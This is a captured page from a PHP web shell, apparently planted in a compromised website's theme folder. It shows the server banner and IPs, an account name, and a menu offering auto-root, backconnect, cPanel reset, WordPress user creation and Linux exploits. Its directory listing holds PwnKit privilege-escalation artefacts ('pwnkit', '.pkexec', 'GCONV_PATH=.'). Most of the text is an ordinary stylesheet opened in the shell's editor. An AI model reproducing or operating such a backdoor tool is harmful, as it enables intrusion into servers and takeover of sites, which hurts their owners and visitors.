Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.224.43.98
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
asd /
theme /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
customstyle.css
27.81
KB
-rw-r--r--
font-awesome.min.css
30.3
KB
-rw-r--r--
owl.carousel.min.css
4.02
KB
-rw-r--r--
owl.theme.default.min.css
1.19
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : customstyle.css
@import url(https://db.onlinewebfonts.com/c/cc84650569fd07dac022c55b20c66e46?family=Futura+Bk+BT+Book); @import url('https://fonts.googleapis.com/css2?family=Goudy+Bookletter+1911&family=Poppins:ital,wght@0,400;0,500;0,600;1,400&family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap'); /* @font-face { font-family: 'Book Antiqua Regular'; src: url('./fonts/Book Antiqua.ttf') format('ttf'), url('./fonts/Book Antiqua Bold Extreme Lefty Regular.ttf') format('ttf'), url('./fonts/Book Antiqua Bold.ttf') format('ttf'), url('./fonts/bookantiquabolditalic.ttf') format('ttf'), url('./fonts/bookantiquaitalic.ttf') format('ttf'); font-display: swap; } */ *, *::before, *::after { margin: 0; padding: 0; box-sizing: border-box; outline: none; } *:focus { outline: none; } body { /* font-family: 'Poppins', sans-serif; font-family: "Futura Bk BT Book"; font-family: "Goudy Bookletter 1911";*/ font: normal 20px/27px "Goudy Bookletter 1911"; color: #000; } a { text-decoration: none; background-color: transparent; color: #19120E; } button, select { text-transform: none; } button, input, optgroup, select, textarea { margin: 0; font-family: inherit; font-size: inherit; line-height: inherit; } img { vertical-align: middle; border-style: none; max-width: 100%; } svg { overflow: hidden; vertical-align: middle; } ul, ol { padding: 0; margin: 0; list-style: none; list-style-type: none; } .custom-container { max-width: 1370px; width: 100%; margin: 0 auto; padding: 0 15px; } .flex-col { display: flex; flex-direction: column; } .flex-sp-bt { display: flex; justify-content: space-between; } .asdf_aa svg, .ne_btn svg { margin-left: 10px; } .mg-auto { margin: auto; } .flex-equal { display: flex; width: 100%; align-items: center; justify-content: space-between; } .flex-just-center, .flex-center { display: flex; justify-content: center; align-items: center; } .pos-relative { position: relative; } .Grids-4 { display: grid; width: 100%; grid-template-columns: repeat(4, 1fr); } .Grids-3 { display: grid; width: 100%; grid-template-columns: repeat(3, 1fr); } .stickY { position: sticky; top: 0; } body.overflow-active { overflow: hidden; } .hide, .dhss, .con_smv, .mb-menucl { display: none; } .hide.mystyle { display: block; position: absolute; font: 600 16px/21px "Futura Bk BT Book"; color: red; } /* header serch */ .home_h1 { color: #FFF; font: 400 96px/105px "Futura Bk BT Book"; text-shadow: 0px 0px 8px rgba(0, 0, 0, 0.15); text-transform: capitalize; position: absolute; bottom: 75px; max-width: 1190px; width: 100%; } .asd-hero { padding: 25px 0 75px; height: 800px; width: 100%; background: rgba(0, 0, 0, 0.15); } .asd-header { position: fixed; /* position: absolute;*/ z-index: 9; width: 100%; top: 25px; transition: top 0.3s ease; } .asd_ul_wrap { padding: 18px 25px; border-radius: 2px; background: rgba(128, 128, 128, 0.25); backdrop-filter: blur(12.5px); } .asdh_ul { display: flex; gap: 25px; } .div_img a { color: #FFF; letter-spacing: 0.5px; font: 400 20px/24px "Futura Bk BT Book"; text-transform: capitalize; } .asdh_a { position: relative; padding-left: 15px; color: #FFF; padding-left: 15px; letter-spacing: 0.5px; font: 400 16px/24px "Futura Bk BT Book"; text-transform: capitalize; } .asdh_a::before { content: ''; position: absolute; left: 0; top: 54%; transform: translateY(-50%); width: 5px; height: 5px; background-color: #fff; border-radius: 50%; visibility: hidden; } .asdh_li:hover .asdh_a::before { visibility: visible; } .asd-header.fixed-top { position: sticky; /*backdrop-filter: blur(10px);*/ animation: slideDown 0.35s ease-out; } @keyframes slideDown { from { transform: translateY(-100%); } to { transform: translateY(0); } } .hamburger { cursor: pointer; } .bar { display: block; background-color: #fff; width: 24px; /* The following 2 properties are essential in creating the "X" when the hamburger is clicked. If you change just 1 of the 2, then you need to find the proper combination for the other one */ height: 2px; margin: 6px auto; transition: all 300ms ease-in-out; } .hamburger.active-mm .bar:nth-child(2) { opacity: 0 } .hamburger.active-mm .bar:nth-child(1) { transform: translateY(8px) rotate(45deg); } .hamburger.active-mm .bar:nth-child(3) { transform: translateY(-8px) rotate(-45deg); } /* header */ /* footer css */ footer { padding: 75px 0 0; border-top: 0.5px solid #797A7C; } .asd_f_wrap { display: flex; gap: 6.67%; padding: 0 25px; } .asd_nw { flex: 0 0 33.33%; gap: 25px; } .asd-nw-h2 { font: 400 40px/48px "Futura Bk BT Book"; text-transform: capitalize; word-wrap: break-word; } .asd-jm { font: 400 20px/24px "Book Antiqua Regular"; letter-spacing: 1px; text-transform: capitalize; } .copy_cat { font: 400 18px/24px "Book Antiqua Regular"; text-transform: capitalize; } .asd_fr_div textarea, .asd_fr_div select, .asd_fr_div input, .asd_se_input { appearance: initial; border: 0; border-bottom: 0.5px solid #000; padding: 5px 0px 10px; width: 100%; font: 400 16px/16px "Poppins"; text-transform: capitalize; resize: none; } .asd_nl_info { margin: 10px 0 25px; font: 400 18px/31px "Roboto"; } .asd_fmenu { flex: 0 0 60%; } .ne_btn { cursor: pointer; border-radius: 2px 0px 0px 2px; background: #000; padding: 18px 30px; font: italic 400 18px/21px "Futura Bk BT"; font-style: italic; color: #FFF; border: 0; outline: 0; text-transform: capitalize; } .asdf_h3 { font: 600 20px/29px "Book Antiqua Regular"; margin: 0 0 35px; letter-spacing: 1px; text-transform: capitalize; } .asdf_ul { gap: 25px; max-width: 126px; } .asdf_a { color: #000; display: block; font: 400 16px/24px "Poppins"; text-transform: capitalize; } .asdb_footer { margin-top: 9.375rem; padding: 15px 25px; border-top: 0.5px solid #797A7C; display: flex; gap: 7%; } .copy_cat { flex: 0 0 21.5%; } .asdbt_a { font: 400 16px/28px "Poppins"; text-transform: capitalize; } .asd_cap { /*font: 500 15px/26px "Poppins";*/ font: 600 15px/26px "Futura Bk BT Book"; text-transform: uppercase; margin-right: 10px; } .copy_cat_add { flex: 0 0 71.9%; } .asdfb_ul { display: flex; gap: 2.30%; flex-wrap: wrap; } /* home about */ .width_1122 { border-bottom: 0.5px solid rgba(187, 187, 187, 0.73); max-width: 1122px; width: 100%; margin: 100px auto 0 auto; padding: 0 0 100px; } .asfh_text { flex: 0 0 90%; padding-left: 11.5%; } .asd_ceo { position: absolute; right: 0; width: 107px; height: 107px; bottom: -80px; } .asd_editor { font: 400 20px/31px "Goudy Bookletter 1911"; } .asd_editor b, .asd_editor span { font: 600 40px/31px "Goudy Bookletter 1911"; } .say_hello { height: 37px; color: #FFF; font: 400 16px/19px "Futura Bk BT"; border-radius: 23px; background: #000; padding: 9px 16px; text-transform: capitalize; } /* home about end */ /* grids 3 section */ .asd-project_sl { padding: 250px 0 105px; } .asd_spaces { max-width: 1190px; width: 100%; margin: auto; gap: 20%; } .asd_v1 { width: 100%; height: 176px; display: flex; align-items: center; justify-content: end; flex-direction: column; } .asd_s1 { gap: 35px; } .space_h2 { font: 600 18px/21px "Futura Bk BT Book"; text-transform: capitalize; text-align: center } .space_p { font: 400 20px/24px "Goudy Bookletter 1911"; margin: 25px 0 32px; } .asd_view { font: 400 16px/19px "Futura Bk BT Book"; text-decoration-line: underline; text-transform: lowercase; text-align: center } /* grids section */ /* more small img */ .colme3 { display: flex; gap: 3rem; } .items_animate img { width: 100%; height: auto; } .col-1 { display: flex; flex: 0 0 17%; flex-direction: column; gap: 3rem; } .custom-container-full { max-width: 1920px; width: 100%; margin-left: auto; margin-right: auto; } .colme3 img { width: 100%; object-fit: contain; } .col-1 .items_animate img { width: 100%; } .col-mid-big p { display: none; font: 400 16px/21px "Goudy Bookletter 1911"; } .col-mid-big, .col-2 { display: flex; flex-direction: column; justify-content: center; gap: 3rem; } .col-2 { flex: 0 0 13%; } .col-2 .items_animate img { height: 170px; } .kjk_logo { max-width: 100%; width: 100%; } /* .colme3 .items_animate:nth-last-child(-n+3), .colme3 .items_animate:nth-child(-n+3) { height:275px; width: calc(100% - 25%); } .colme3 .items_animate:nth-last-child(-n+3) img, .colme3 .items_animate:nth-child(-n+3) img { width:100%; height:275px; object-fit:cover; } .colme3 .items_animate:nth-last-child(-n+6):nth-last-child(n+4), .colme3 .items_animate:nth-child(n+4):nth-child(-n+6) { height:220px; width: calc(100% - 25%); } .colme3 .items_animate:nth-child(7) { height:1000px; width: calc(100% + 50%); break-inside: avoid; } .items_animate { display:flex; margin:0 0 3rem; } */ /* more small img */ /* slider */ .asdcl-items { position: relative; } .asd_sl_txt { padding: 39px 35px; background: #fff; border-radius: 15px; box-shadow: 0px 0px 8px 0px #0000001A; font: 400 20px/24px "Goudy Bookletter 1911"; position: relative; max-width: 650px; width: 100%; left: -210px; top: -39px; } .sl_asd_view { position: absolute; bottom: 0; right: 0; border-radius: 15px 0px; padding: 10px; background: #000; color: #fff; text-transform: capitalize; font: italic 400 16px/19px "Futura Bk BT Book"; } .asd-project_sl .owl-carousel .owl-item .img_logo_v1 { max-width: 100%; height: 434px; object-fit: cover; position: relative; } .asd_sl_txt { display: none; } .asd-project_sl .owl-carousel .owl-item.active .asd_sl_txt { display: block; } .asd-project_sl .owl-carousel button svg rect { fill: #000000; } .asd-project_sl .owl-carousel button svg path { fill: #ffffff; } .asd-project_sl .owl-carousel button.disabled svg path { fill: #B0B0B0; } .asd-project_sl .owl-carousel button.disabled svg rect { fill: #ECECEC; } .asd-project_sl .owl-carousel .owl-nav { position: absolute; display: flex; gap: 10px; width: max-content; left: 55.5%; bottom: 111px; } .content_div.current { display: inherit; } .content_div { display: none; } .data-tabs { display: flex; gap: 1rem; align-items: center; /* margin: 0 0 2rem;*/ } .asd-project_sl .dm-flx.flex-sp-bt { margin: 0 0 2rem; align-items: center; } .data-tabs .tab.current { background: #000; } .data-tabs .tab { position: relative; cursor: pointer; border-radius: 35px; padding: 7px 25px; background: #E2E2E2; color: #fff; text-transform: capitalize; font: 400 16px/19px "Futura Bk BT Book"; } /* slider small */ /* five point */ .asd-fiv { padding: 103px 0 125px; } .width-1290 { max-width: 1290px; width: 100%; margin: auto; gap: 140px; } .asd_five_li { display: flex; justify-content: space-between; padding: 15px 21px; border-bottom: 1px solid #000; } .asd_txt_five { flex: 0 0 70%; display: flex; justify-content: end; align-items: end; /*font: 400 16px/21px "Futura Bk BT Book";*/ font: 400 16px/21px "Poppins"; } .asd_mo { font: 400 40px/60px "Poppins"; text-transform: capitalize; } .width-518 { max-width: 520px; width: 100%; margin: auto; gap: 20px; } .asdf_aa { padding: 20px 23px; background: #000; color: #fff; font: 400 italic 16px/21px "Futura Bk BT Book"; width: max-content; } .max_h2 { font: 400 20px/21px "Goudy Bookletter 1911"; } .max_h2 span { font: 400 40px/40px "Goudy Bookletter 1911"; } /* five point */ /* faq */ .asd-indexfaq { padding: 175px 0 0; } .asd-faq { display: flex; gap: 3.5%; } .asd-faqv1 { flex: 0 0 65%; } .asd-latest { flex: 0 0 31.5%; } .asd_ul_faq { margin: 75px 0 0; } .line_asd { width: 100%; margin: 50px 0; background: #A4A4A4; height: 0.5px; } .asd_qa { font: 600 18px/24px "Futura Bk BT Book"; text-transform: capitalize; margin: 0 0 25px; cursor: pointer; } .asd_ans { font: 400 14px/21px "Poppins"; } .ul_active { gap: 35px; } .active_h2 { font: 600 18px/22px "Futura Bk BT Book"; margin-bottom: 25px; } .space_logo { width: 100%; height: 232px; object-fit: cover; } .place_name { font: 400 16px/21px "Poppins"; text-transform: capitalize; margin: 10px 0; } .place_name span { color: #A4A4A4; margin-left: 8px; } .place_kk { font: 400 24px/32px "Roboto"; } .asd-moreq { padding: 225px 0 250px; } .max-1025 { max-width: 1025px; width: 100%; margin: auto; text-align: center; gap: 25px; } .asd_h2_contact { font: 400 40px/34px "Poppins"; } .max-1025 p { font: 400 16px/21px "Futura Bk BT Book"; } /* contact us */ .asd-contact { padding: 160px 0 100px; } .asd_contact_wrap { gap: 150px; max-width: 1190px; width: 100%; margin: auto; } .asd_fm { display: flex; gap: 8%; } .asd_img_contact { flex: 0 0 36.5%; } .asd_fm_in { flex: 0 0 55.5%; } .con_logo {} .asd_cmp { margin: 75px 0; } .cap_h2 { font: 400 64px/42px "Poppins"; text-transform: capitalize; margin-bottom: 10px; } .contact-form-asd label { font: 400 18px/31px "Roboto"; display: block; margin-bottom: 10px; } .asd_fr_div { margin-bottom: 46px; } .vm_text { margin-top: 10px; font: 400 20px/24px "Goudy Bookletter 1911"; } .contact-form-asd .ne_btn { padding: 18px 14px; font: 400 18px/21px "Futura Bk BT"; } .asd_cdata { display: flex; gap: 14.5%; } .contact_fm_txt { flex: 0 0 58.5%; } .contact_fm_wrap { flex: 0 0 27%; text-align: right; gap: 50px; } .list_v11 h3 { color: #A4A4A4; font: 400 14px/19px "Poppins"; text-transform: uppercase; margin-bottom: 10px; } .list_v11 p { font: 400 18px/27px "Roboto"; } .list_v11 a { color: #000; } .asd_cont_social { display: flex; gap: 10px; justify-content: end; } .contact_fm_txt h2 { font: 400 40px/43px "Poppins"; margin-bottom: 25px; text-transform: capitalize; } .contact_fm_txt, .contact_fm_txt p { font: 400 20px/24px "Goudy Bookletter 1911"; } .contact_fm_txt p { margin-bottom: 25px; } /* faq */ .asd-activities { padding: 160px 0 100px; } .sm_h1 { text-align: center; font: 400 64px/90px "Poppins"; } .sm_work { text-align: center; font: 400 14px/19px "Poppins"; text-transform: uppercase; } .dmasd-v2 { padding: 75px 0; } .dmfilter_grids { border-top: 0.5px solid #797A7C; } .ul_filter, .ul_rlactive { gap: 35px; } .base_cat { display: flex; margin: 25px 0; justify-content: space-between; } .cat_h2 { font: 600 18px/21px "Futura Bk BT Book"; } .filter_change { font: 600 16px/21px "Futura Bk BT Book"; display: flex; gap: 10px; align-items: center; } .filter_change span { font: 600 16px/21px "Futura Bk BT Book"; text-transform: capitalize; } .fl_list { display: none; font: 400 16px/21px "Futura Bk BT Book"; } .fl_list.show { display: block; } .ul_filter { gap: 50px 35px; } .vmmm { margin: 75px 0 150px; text-align: center; } .load_wht { padding: 15px 50px; border: 1px solid #000; font: 400 16px/21px "Futura Bk BT Book"; text-transform: capitalize; } .flex_contact { display: flex; gap: 4%; } .Img_call { flex: 0 0 24.5%; } .call_text_to { flex: 0 0 71.5%; font: 400 16px/21px "Futura Bk BT Book"; } .dmfilter_grids, .our_ls_work { padding: 0 15px; } .call_text_to h3 { font: 400 48px/53px "Poppins"; /* text-transform: capitalize;*/ } .call_text_to .ne_btn { margin-top: 25px; display: inline-block; } /* faq */ /* footer css end */ /* about us */ .asd-about-page { padding: 110px 0 0 0; } .bc_imgv1 { width: 100%; height: 670px; margin-top: 30px; /* background-size: cover; Adjust as needed */ /* background-position: center; Adjust as needed */ } .about_bc { width: 100%; height: 800px; } .con_lg { margin-top: -35px; } .max-796 { max-width: 796px; width: 100%; margin: 100px auto; text-align: center; font: 400 20px/24px "Goudy Bookletter 1911" } .max-1034 { max-width: 1034px; width: 100%; margin: auto; padding: 110px 0 213px; } .bottom_v1 .asdf_aa { padding: 20px 32px } .asd-ceo { width: 100%; height: 808px; position: relative; display: flex; align-items: center; justify-content: center; } .f500-ceo { max-width: 430px; width: 100%; margin: auto; position: relative; } .class_ceo { border-radius: 200px; } .hii_w { position: absolute; top: 50%; right: -32px; transform: translateY(-50%); border-radius: 19px 23px 23px 0px; padding: 7px 14px; background: #000; color: #fff; font: italic 400 16px/19px "Futura Bk BT Book"; } .ceo_info { display: flex; flex-direction: column; gap: 2.5rem; text-align: center; padding: 3.5rem 0 7rem; } .Ceo_nm-info p { font: 400 15px/22px "Poppins"; text-transform: capitalize; } .Ceo_nm-info h2 { font: 400 40px/60px "Poppins"; text-transform: capitalize; } .Ceo_more_info { font: 400 20px/27px "Poppins"; font: 400 20px/27px "Futura Bk BT Book"; } .Ceo_more_info p { margin-bottom: 15px; } .Ceo_more_info p:last-child { margin: 0; } .max-ceo img { width: 100%; height: 348px; object-fit: cover; } .maxcol_txt { column-count: 2; column-gap: 6rem; } .col_text h2 { font: 400 40px/60px "Poppins"; text-transform: capitalize; margin: 30px 0; } .maxcol_txt p { font: normal 20px/27px "Goudy Bookletter 1911"; margin-bottom: 15px; } /* about us end */ /* blog single page */ .asd-bredc { margin: 85px 0 0 0; padding: 40px 0; } .asdb_a { color: #BBB; font: 400 16px/24px "Futura Bk BT Book"; text-transform: capitalize; } .bred_ul { gap: 15px; } .bred_ul li:last-child a { color: #000; } .flex_cat { display: flex; gap: 9.8%; } .flex_cat_left { flex: 0 0 14.5%; } .flex_cat_right { flex: 0 0 75.7%; } .place_li { padding: 0 0 15px; border-bottom: 0.5px solid #797A7C; } .place_li:last-child { padding: 0 0 15px; border-bottom: 0; } .cat_h2b { font: 400 14px/24px "Roboto"; color: #BBB; text-transform: uppercase; margin: 0 0 5px 0; } .cat_pb { font: 400 16px/28px "Poppins"; text-transform: capitalize; } .list_ul { gap: 15px; } .flex_wrap_tx { display: flex; justify-content: space-between; gap: 6%; margin: 30px 0 0 0; } .xs_asd { flex: 0 0 45%; } .tag_asd { flex: 0 0 38%; } .blogh1 { font: 400 62px/52px "Poppins"; text-transform: capitalize; margin: 0 0 5px; /* position: absolute; left: 0; top: -53px;*/ } .main_project { width: 100%; height: 380.50px; object-fit: cover; } .rent_asd { max-width: 92%; width: 100%; font: 400 20px/24px "Goudy Bookletter 1911"; color: #000; margin-top: 35px; } .list_ul_tag { display: flex; /* margin-top: 35px;*/ flex-wrap: wrap; gap: 12.5px; justify-content: end; } .tags_li { line-height: 19px; padding: 7px 25px; border-radius: 35px; border: 1px solid #B0B0B0; } .tags_li a { font: 400 16px/19px "Futura Bk BT Book"; color: #B0B0B0; text-transform: capitalize; } .asd_rect_flex { display: flex; gap: 7%; } .max-1049 { max-width: 1049px; width: 100%; margin: 100px auto; gap: 75px; } .rect_text { flex: 0 0 52%; } .rect_58 { flex: 0 0 41%; } .about-me h1, .blg_h2 { font: 400 40px/53px "Poppins"; text-transform: capitalize; margin: 25px 0; } .mor_text_blog, .rect_text { font: 400 20px/24px "Goudy Bookletter 1911" } .about-me p, .mor_text_blog p, .rect_text p { margin-bottom: 25px; } .dmwrap-1049 .asd_rect_flex:nth-child(3n - 1) { flex-direction: row-reverse; } .dmwrap-1049 .asd_rect_flex:nth-child(3n) { flex-direction: column-reverse; gap: 15px; margin: auto; max-width: 440px; width: 100%; } .active_h2 { font: 600 18px/24px "Futura Bk BT Book"; margin-bottom: 25px; } /* blog single page end */ /* responsive */ @media (max-width: 1200px) { .home_h1 { font: 400 80px/86px "Futura Bk BT Book"; } .asd_mo { font: 400 34px/52px "Poppins"; } .asd_h2_contact { font: 400 34px/38px "Poppins"; } .asd_nw { flex: 0 0 36.333%; } .asd_fmenu { flex: 0 0 57%; } .asd-nw-h2 { font: 400 30px/38px "Futura Bk BT Book"; } .asdb_footer { gap: 3%; } .asdfb_ul { gap: 1.75%; } .copy_cat_add { flex: 0 0 75.9%; } .asd-moreq, .asd-indexfaq, .asd-fiv, .asd-project_sl { padding: 105px 0; } .asd_sl_txt { left: -75px; } .asd_spaces { gap: 7%; } .width-1290 { gap: 100px; } .colme3 { gap: 2rem; } } @media (max-width: 992px) {} @media (max-width: 767px) { .blogh1, .hii_w, .col-1, .con_lg, .col-2, .mb-hide, .asd-bredc, .say_hello { display: none; } .max_h2, .asd-about .asd_editor, .space_text { text-align: center; } .max-796 { text-align: left; } .maxcol_txt { column-count: 1; column-gap: unset; } .asd-hero { height: 567px; } .home_h1 { font: 400 48px/57px "Futura Bk BT Book"; } .sm_h1 { text-align: left; font: 400 64px/90px "Poppins"; } .asd_ans, .asd_fr_div select option { font: 400 16px/23px "Poppins"; } .contact_fm_txt h2, .asd_mo { font: 400 30px/46px "Poppins"; } /* .asd_editor b, .asd_editor span { font: 600 24px/31px "Goudy Bookletter 1911"; } */ .asd_view { font: 600 16px/19px "Futura Bk BT Book"; } .contact_fm_txt, .contact_fm_txt p, .max_h2, .space_p, .asd_editor { font: 400 16px/21px "Goudy Bookletter 1911"; } .asd_h2_contact { font: 400 34px/38px "Goudy Bookletter 1911"; } .bottom_v1 .asdf_aa, .asdf_aa { padding: 11px 23px; font: 400 16px/17px "Futura Bk BT Book"; } .ne_btn { padding: 11px 23px; font: 400 italic 16px/17px "Futura Bk BT Book"; } .vm_text { margin-top: 15px; font: 400 16px/21px "Goudy Bookletter 1911"; } .ul_filter, .ul_rlactive { grid-template-columns: repeat(1, 1fr); gap: 35px; } .vmmm { margin: 75px 0 130px; } .flex_contact { flex-direction: column; gap: 20px; } .tag_asd, .flex_cat_left, .flex_cat_right, .call_text_to, .Img_call { flex: 0 0 100%; } .call_text_to h3 { font: 400 36px/48px "Poppins"; margin-bottom: 15px; } .asd-bredc { margin: 85px 0 0 0; padding: 40px 0; } .flex_wrap_tx, .flex_cat { flex-direction: column-reverse; gap: 20px; } .flex_cat_right img { width: 100%; height: 205px; object-fit: cover; } .list_ul { gap: 15px; max-width: 55%; } .list_ul_tag { margin-top: 30px; gap: 10px; justify-content: start; } .tags_li a { display: block; } .max-1049 { margin: 100px auto; gap: 50px; } /* .asd_rect_flex { gap: 20px; flex-direction: column; } .dmwrap-1049 .asd_rect_flex:nth-child(3n - 1) { flex-direction: column; } .dmwrap-1049 .asd_rect_flex:nth-child(3n - 1) { flex-direction: column; } */ .width_1122 { margin: 50px auto 0 auto; padding: 0 0 50px; } .asd_ceo { width: 65px; height: 65px; bottom: -113px; left: 50%; transform: translate(-50%, -50%); } .data-tabs { gap: 0.5rem; margin: 0 0 1rem; flex-wrap: wrap; } .asd-project_sl .owl-carousel .owl-item .img_logo_v1 { height: 175px; } .asd-project_sl .owl-carousel .owl-item.active .asd_sl_txt { max-width: calc(100% - 30px); left: 15px; top: 30px; padding: 15px 15px 30px 15px; font: 400 16px/21px "Goudy Bookletter 1911"; } .asfh_text { flex: 0 0 100%; padding-left: 0; } .asd_spaces { max-width: 245px; gap: 3rem; grid-template-columns: repeat(1, 1fr); } .asd_spaces .flex-col:nth-child(1) img { width: 110px; height: 110px; object-fit: cover; } .asd_spaces .flex-col:nth-child(2) img { height: 110px; } .asd-indexfaq { padding-bottom: 0; } .dmfilter_grids, .our_ls_work, .max-1034, .asd-about .custom-container, .asd-fiv .custom-container { padding: 0 0px; } .asd-allproject .custom-container-full, .asd-about .asd_editor, .asd-fiv .width-518 { padding: 0 15px; } .asd_five_li { flex-direction: column; padding: 15px; } .con_smv, .col-mid-big p { display: block; } .contact_fm_txt p, .col-mid-big img { margin-bottom: 10px; } .asd_fr_div { margin-bottom: 30px; } .asd-faq { gap: 100px; flex-direction: column; } .asd-faqv1 .max_h2 { display: flex; flex-direction: column; gap: 15px; align-items: flex-start; } .asd_ul_faq { margin: 50px 0 0; } .asd_qa { font: 600 18px/21px "Futura Bk BT Book"; margin: 0 0 20px; display: flex; gap: 2rem; } .line_asd { margin: 35px 0; } .asd_f_wrap { flex-direction: column; gap: 4rem; padding: 0; } .asd_nl_info { font: 400 16px/27px "Poppins"; } .asd_fmenu { flex: 0 0 100%; gap: 35px; flex-direction: column; } .asdf_ul { gap: 20px 25px; max-width: 100%; flex-direction: row; flex-wrap: wrap; } .asdf_h3 { font: 600 24px/28px "Goudy Bookletter 1911"; margin: 0 0 25px; letter-spacing: 1px; text-transform: capitalize; } .asdb_footer { margin: 2.5rem 0; padding: 15px 0px; flex-direction: column; gap: 1.2rem; } .copy_cat { font: 600 18px/30px "Futura Bk BT Book"; } .asdfb_ul { gap: 0.75rem; flex-direction: column; } .asd_txt_five { flex: 0 0 100%; justify-content: flex-start; align-items: flex-start; } /* .asdh_ul { display: block; width: 100%; position: absolute; background: #fff; inset: 0; height: calc(100vh - 25px); top:70px; } */ .dhss, .mb-menucl { display: block; } .asd_ul_wrap { padding: 15px; } .asdh_ul { position: fixed; left: -100%; top: -25px; width: 100%; height: 100vh; margin-left: -15px; margin-right: -15px; flex-direction: column; background-color: rgba(38, 38, 38, 0.85); gap: 1.2rem; align-items: center; justify-content: center; transition: 750ms; } .asdh_ul.active-mm { left: 0; width: calc(100% + 30px); } .div_img, .hamburger { z-index: 9; position: relative; } .asdh_li a, .asdh_li { width: 100%; display: block; text-align: center; } .bc_imgv1 { height: unset; margin-top: 0; background-image: unset !important; } .con_smv { border-radius: 30px; } .asd-header { top: 10px; } .about_bc { height: auto; } .blog-body, .asd-about-page { padding: 85px 0 0 0; } .about-me h1, .blg_h2 { font: 400 36px/51px "Poppins"; margin: 0 0 20px; } .asd-ceo { background-image: unset !important; height: auto; margin-top: 105px; } .asd_fm { flex-direction: column; gap: 1rem; } .con_logo { width: 328px; height: 328px; object-fit: cover; } .asd_cmp { margin: 15px 0 25px; } .cap_h2 { font: 400 48px/48px "Poppins"; } .asd_contact_wrap { gap: 50px; } .asd_cdata { flex-direction: column; } .contact_fm_wrap { flex: 0 0 100%; text-align: left; gap: 30px; } .contact_fm_txt { flex: 0 0 100%; margin-bottom: 50px; } .asd_cont_social { justify-content: flex-start; } .contact_fm_wrap .list_v11:last-child { display: none; } .asd-activities, .asd-contact { padding: 85px 0 105px; } .sm_h1 { text-align: left; font: 400 45px/50px "Poppins"; } .sm_work { text-align: left; font: 400 14px/19px "Poppins"; margin-top: 4px; } .dmasd-v2 { padding: 30px 0 50px; } .dmwrap-1049 .asd_rect_flex:nth-child(3n - 1), .asd_rect_flex:nth-child(3n + 1) { flex-direction: column; } html, body { overflow-x: hidden !important; } }
Close